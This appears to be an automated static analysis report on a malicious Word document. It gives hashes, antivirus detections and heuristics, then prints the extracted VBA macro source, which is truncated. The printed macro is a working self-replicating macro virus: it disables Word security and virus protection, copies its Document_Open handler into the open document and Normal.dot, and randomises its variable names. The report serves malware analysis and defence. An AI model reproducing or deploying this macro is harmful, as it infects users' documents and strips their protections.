Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6afade65a90a0879…

MALICIOUS

Office (OLE)

34.5 KB Created: 2003-09-17 19:15:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 6af958f3ee9f9444b1e5633560dcd4d3 SHA-1: e63bd53461596c89be746d7d07e25634ec821838 SHA-256: 6afade65a90a08791a959dfd6d39982d4ed82032be8ec431005c915e0d757a38
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code as soon as a document is opened. The macro lowers Word's security settings (in the extracted script it writes the Office 9.0 Word Security `Level` value through `System.PrivateProfileString` and sets `Options.VirusProtection = False`) and then copies its own Document_Open handler into the active document's and the Normal template's code modules before saving them, which is self-replicating macro-virus behaviour; it may also act as a downloader for a secondary stage, but no download step is visible in the truncated preview of the script. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Kpmv-1' further confirm its malicious nature.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4811 bytes
SHA-256: 742d4cdd629919d47c1cbc897d2b3076d5c00de2b8f8168834210f722a0870fe
Detection
ClamAV: Doc.Trojan.Kpmv-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module header as exported by oletools/olevba: attributes of the document's
' "ThisDocument" class module. These Attribute lines carry no executable code;
' they are only shown here because the decoded macros.bas keeps the raw export.
' VB_Base = "1Normal.ThisDocument" references the Normal template's ThisDocument —
' presumably the document was created from Normal.dot; confirm against the OLE metadata.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Second module header in the same carved file: a class module named "Classe1"
' (the extracted macros.bas concatenates both modules). The Document_Open
' handler that immediately follows this header is the auto-execute entry point
' behind the OLE_VBA_DOCOPEN finding above.
Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Document_Open(): On Error Resume Next

Dim ci73r7(27) As String: ci73r7(0) = "pz08x6": ci73r7(1) = "em32f0": ci73r7(2) = "em71a0": ci73r7(3) = "rc78s4": ci73r7(4) = "eh99f9": ci73r7(5) = "ed26f8": ci73r7(6) = "rc78s4": ci73r7(7) = "rt51q4": System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

ci73r7(8) = "ke77v5": ci73r7(9) = "eo06y8": ci73r7(10) = "vk24i1": ci73r7(11) = "tr58e2": ci73r7(12) = "ve43n1": ci73r7(13) = "rx69m3": ci73r7(14) = "cl47o8": ci73r7(15) = "oh00r3": Options.VirusProtection = False

ci73r7(16) = "lz48l4": ci73r7(17) = "px81e2": ci73r7(18) = "kc32b4": ci73r7(19) = "xq21t8": ci73r7(20) = "gs36v6": ci73r7(21) = "rb07u2": ci73r7(22) = "ci73r7": ci73r7(23) = "cj21t6": Options.SaveNormalPrompt = False

ci73r7(24) = "vq90j8": ci73r7(25) = "jj35u3": ci73r7(26) = "zn24h7": ci73r7(27) = "lr52v2": Options.ConfirmConversions = False

Set pz08x6 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

Set em32f0 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule

Set em71a0 = ThisDocument.VBProject.VBComponents.Item(1).CodeModule

eh99f9 = "private sub" & " document_open()": ed26f8 = "end" & " sub"

rc78s4 = em71a0.Lines(1, em71a0.CountOfLines)

rt51q4 = InStr(LCase(rc78s4), eh99f9)

ke77v5 = InStr(rt51q4, LCase(rc78s4), ed26f8) + Len(ed26f8)

eo06y8 = Mid(rc78s4, rt51q4, ke77v5 - rt51q4)

If pz08x6.CountOfLines <> 0 Then

vk24i1 = pz08x6.Lines(1, pz08x6.CountOfLines)

If InStr(vk24i1, "(27) As String") = 0 Then

If InStr(LCase(vk24i1), eh99f9) <> 0 Then

tr58e2 = False

For ve43n1 = 1 To pz08x6.CountOfLines: DoEvents

If tr58e2 = False Then

If LCase(pz08x6.Lines(ve43n1, 1)) = eh99f9 Then

tr58e2 = True

rx69m3 = ve43n1

End If

Else

If LCase(pz08x6.Lines(ve43n1, 1)) = ed26f8 Then

cl47o8 = ve43n1

Exit For

End If

End If

Next

pz08x6.DeleteLines rx69m3, cl47o8 - (rx69m3 - 1)

End If

Set oh00r3 = pz08x6

pz08x6.addfromstring eo06y8: If ActiveDocument.Saved = False Then ActiveDocument.Save

End If

Else

Set oh00r3 = pz08x6

pz08x6.addfromstring eo06y8: If ActiveDocument.Saved = False Then ActiveDocument.Save

End If

If em32f0.CountOfLines <> 0 Then

lz48l4 = em32f0.Lines(1, em32f0.CountOfLines)

If InStr(lz48l4, "(27) As String") = 0 Then

If InStr(LCase(lz48l4), eh99f9) <> 0 Then

tr58e2 = False

For ve43n1 = 1 To em32f0.CountOfLines: DoEvents

If tr58e2 = False Then

If LCase(em32f0.Lines(ve43n1, 1)) = eh99f9 Then

tr58e2 = True

rx69m3 = ve43n1

End If

Else

If LCase(em32f0.Lines(ve43n1, 1)) = ed26f8 Then

cl47o8 = ve43n1

Exit For

End If

End If

Next

em32f0.DeleteLines rx69m3, cl47o8 - (rx69m3 - 1)

End If

Set oh00r3 = em32f0

em32f0.addfromstring eo06y8: If NormalTemplate.Saved = False Then NormalTemplate.Save

End If

Else

Set oh00r3 = em32f0

em32f0.addfromstring eo06y8: If NormalTemplate.Saved = False Then NormalTemplate.Save

End If

If oh00r3 <> "" Then

Dim px81e2 As Long, kc32b4 As Long, xq21t8 As Long, gs36v6 As Long

For rb07u2 = 0 To UBound(ci73r7): DoEvents

Randomize: cj21t6 = Chr(97 + (Rnd * 25)) & Chr(97 + (Rnd * 25)) & Chr(48 + (Rnd * 9)) & Chr(48 + (Rnd * 9)) & Chr(97 + (Rnd * 25)) & Chr(48 + (Rnd * 9)): DoEvents

px81e2 = 1: kc32b4 = 1

With oh00r3

Do While .Find(ci73r7(rb07u2), px81e2, kc32b4, xq21t8, gs36v6, True)

vq90j8 = .Lines(xq21t8, 1)

jj35u3 = Mid(vq90j8, 1, kc32b
... (truncated)